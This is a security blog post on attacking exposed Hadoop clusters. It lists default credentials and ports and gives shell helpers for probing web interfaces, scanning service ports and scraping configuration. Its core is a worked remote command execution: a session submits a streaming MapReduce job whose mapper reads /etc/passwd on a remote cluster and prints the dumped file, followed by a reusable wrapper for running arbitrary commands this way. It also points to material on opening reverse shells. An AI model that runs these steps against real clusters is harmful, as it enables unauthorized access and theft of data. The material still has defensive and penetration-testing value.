Monday, June 5, 2017

DevOoops: Hadoop

What is Hadoop?

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."

If you've ever heard of MapReduce, you've heard of Hadoop.

NFI what I'm talking about? Here is a 3-minute video on it:

What are common issues with MapReduce / Hadoop?

Hadoop injection points from Kaluzny's ZeroNights talk:


Common default credentials: admin/admin, cloudera/cloudera

Although occasionally you'll find one that will just let you pick your own :-)

If you gain access, you get full HDFS access, can run queries, etc.

HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).

From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.
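
A quick way to check whether those web interfaces answer is to request them and look at the HTTP status code. This is only a sketch: it assumes curl is installed, the function names and the namenode/datanode1 hostnames are made up for illustration, and the ports are just the defaults mentioned above.

```shell
# Build the NameNode web UI URL (default port 50070, overridable as $2).
namenode_ui_url() {
    printf 'http://%s:%s/\n' "$1" "${2:-50070}"
}

# Build the DataNode web UI URL (default port 50075, overridable as $2).
datanode_ui_url() {
    printf 'http://%s:%s/\n' "$1" "${2:-50075}"
}

# Print the HTTP status code curl received for a URL (5 second timeout).
http_status() {
    curl -s -o /dev/null -m 5 -w '%{http_code}\n' "$1"
}

# Example usage (hypothetical hosts):
#   http_status "$(namenode_ui_url namenode)"
#   http_status "$(datanode_ui_url datanode1)"
```

A 200 from either URL suggests the interface is reachable without any authentication in front of it.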

update: The hadoop attack library is worth checking out.

Most up-to-date presentation on hadoop attack library:

There is a piece around RCE (

You'll need info from the NameNode's configuration page at ip:50070/conf
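
The /conf page returns the cluster configuration as XML property entries. As a rough sketch, the helper below pulls a single value out of that XML using only tr and awk. conf_value is a made-up name, and which properties you actually need (fs.defaultFS and yarn.resourcemanager.address are used as examples) is an assumption here, not something the talk material above spells out.

```shell
# conf_value NAME
# Reads Hadoop configuration XML on stdin and prints the <value> that
# follows <name>NAME</name>. A text-level sketch, not a real XML parser.
conf_value() {
    # Put every tag on its own line so awk can match "name>..." and "value>...".
    tr -d '\n' | tr '<' '\n' | awk -v want="name>$1" '
        $0 == want { found = 1; next }
        found && index($0, "value>") == 1 { print substr($0, 7); exit }
    '
}

# Example usage (replace ip with the NameNode address):
#   curl -s http://ip:50070/conf | conf_value fs.defaultFS
#   curl -s http://ip:50070/conf | conf_value yarn.resourcemanager.address
```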

TL;DR: find the correct open Hadoop ports and run a MapReduce job against the remote Hadoop server.
You need to be able to access the following Hadoop services through the network:
  • YARN ResourceManager: usually on ports 8030, 8031, 8032, 8033 or 8050
  • NameNode metadata service in order to browse the HDFS datalake: usually on port 8020
  • DataNode data transfer service in order to upload/download files: usually on port 50010
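
To see which of those services are reachable from where you sit, a simple TCP connect check is enough. The sketch below assumes a netcat that supports -z and -w (most do); hadoop_ports and check_hadoop_ports are hypothetical helper names, and the port list only covers the usual defaults listed above, so a cluster with custom ports will need the values from its configuration instead.

```shell
# The default ports from the list above, one "port service" pair per line.
hadoop_ports() {
    cat <<'EOF'
8030 yarn-resourcemanager
8031 yarn-resourcemanager
8032 yarn-resourcemanager
8033 yarn-resourcemanager
8050 yarn-resourcemanager
8020 namenode-metadata
50010 datanode-transfer
EOF
}

# check_hadoop_ports HOST
# Attempts a TCP connection to each port and reports open/closed.
check_hadoop_ports() {
    hadoop_ports | while read -r port service; do
        # </dev/null keeps nc from consuming the loop's input.
        if nc -z -w 3 "$1" "$port" </dev/null 2>/dev/null; then
            echo "open   $port $service"
        else
            echo "closed $port $service"
        fi
    done
}

# Example usage (hypothetical host):
#   check_hadoop_ports namenode
```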

Let's see it in action:

lookupfailed-2:hadoop CG$ hadoop jar /usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar -input /tmp/a.txt -output blah_blah -mapper "/bin/cat /etc/passwd" -reducer NONE

17/01/05 22:11:40 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/hadoop-unjar5960812935334004257/] [] /var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/streamjob4422445860444028358.jar tmpDir=null
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at
17/01/05 22:11:43 INFO mapred.FileInputFormat: Total input paths to process : 1
17/01/05 22:11:43 INFO mapreduce.JobSubmitter: number of splits:2
17/01/05 22:11:44 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1483672290130_0001
17/01/05 22:11:45 INFO impl.YarnClientImpl: Submitted application application_1483672290130_0001
17/01/05 22:11:45 INFO mapreduce.Job: The url to track the job:
17/01/05 22:11:45 INFO mapreduce.Job: Running job: job_1483672290130_0001
17/01/05 22:12:00 INFO mapreduce.Job: Job job_1483672290130_0001 running in uber mode : false
17/01/05 22:12:00 INFO mapreduce.Job:  map 0% reduce 0%
17/01/05 22:12:10 INFO mapreduce.Job:  map 100% reduce 0%
17/01/05 22:12:11 INFO mapreduce.Job: Job job_1483672290130_0001 completed successfully
17/01/05 22:12:12 INFO mapreduce.Job: Counters: 30
File System Counters
FILE: Number of bytes read=0
FILE: Number of bytes written=240754
FILE: Number of read operations=0
FILE: Number of large read operations=0
FILE: Number of write operations=0
HDFS: Number of bytes read=222
HDFS: Number of bytes written=2982
HDFS: Number of read operations=10
HDFS: Number of large read operations=0
HDFS: Number of write operations=4
Job Counters 
Launched map tasks=2
Data-local map tasks=2
Total time spent by all maps in occupied slots (ms)=21171
Total time spent by all reduces in occupied slots (ms)=0
Total time spent by all map tasks (ms)=21171
Total vcore-milliseconds taken by all map tasks=21171
Total megabyte-milliseconds taken by all map tasks=21679104
Map-Reduce Framework
Map input records=1
Map output records=56
Input split bytes=204
Spilled Records=0
Failed Shuffles=0
Merged Map outputs=0
GC time elapsed (ms)=279
CPU time spent (ms)=1290
Physical memory (bytes) snapshot=209928192
Virtual memory (bytes) snapshot=3763986432
Total committed heap usage (bytes)=65142784
File Input Format Counters 
Bytes Read=18
File Output Format Counters 
Bytes Written=2982
17/01/05 22:12:12 INFO streaming.StreamJob: Output directory: blah_blah

lookupfailed-2:hadoop CG$ hadoop fs -ls blah_blah
17/01/05 22:12:22 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 3 items
-rw-r--r--   3 root supergroup          0 2017-01-05 22:12 blah_blah/_SUCCESS
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00000
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00001

lookupfailed-2:hadoop CG$ hadoop fs -cat blah_blah/part-00001
17/01/05 22:12:49 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
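
The three steps above (submit a map-only streaming job, then read the output directory) can be wrapped in one helper. This is a sketch under a few assumptions: the hadoop client is on your PATH and already configured for the remote cluster, STREAMING_JAR points at your local hadoop-streaming jar, and run_via_streaming is a made-up name.

```shell
# Assumptions: override HADOOP if the client is not on PATH, and set
# STREAMING_JAR to the hadoop-streaming jar of your install.
HADOOP="${HADOOP:-hadoop}"
STREAMING_JAR="${STREAMING_JAR:-hadoop-streaming.jar}"

# run_via_streaming INPUT OUTPUT_DIR COMMAND
# Submits COMMAND as the mapper of a map-only streaming job, then prints
# whatever the map tasks wrote to OUTPUT_DIR.
run_via_streaming() {
    "$HADOOP" jar "$STREAMING_JAR" \
        -input "$1" -output "$2" \
        -mapper "$3" -reducer NONE || return 1
    # The glob is quoted so that HDFS expands it, not the local shell.
    "$HADOOP" fs -cat "$2/part-*"
}

# Example usage, mirroring the session above:
#   run_via_streaming /tmp/a.txt blah_blah "/bin/cat /etc/passwd"
```

Two things to keep in mind: the output directory must not already exist, and the command runs once per map task, which is why the run above produced two identical part files.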

Walks you thru how to get reverse shells or Meterpreter shells (Windows) if you can run commands.


Video of the above talk from AppSecEU 2015

What did I miss?  Anything to add?



Anonymous said...

Hello I'm Thomas, maintainer of the hadoop-attack-library and author of the talk you pointed.
Few stuff :
- The github has been moved from to
- Our most up-to-date presentation is here:

Cheers !

CG said...

thx! I updated the post with the updated info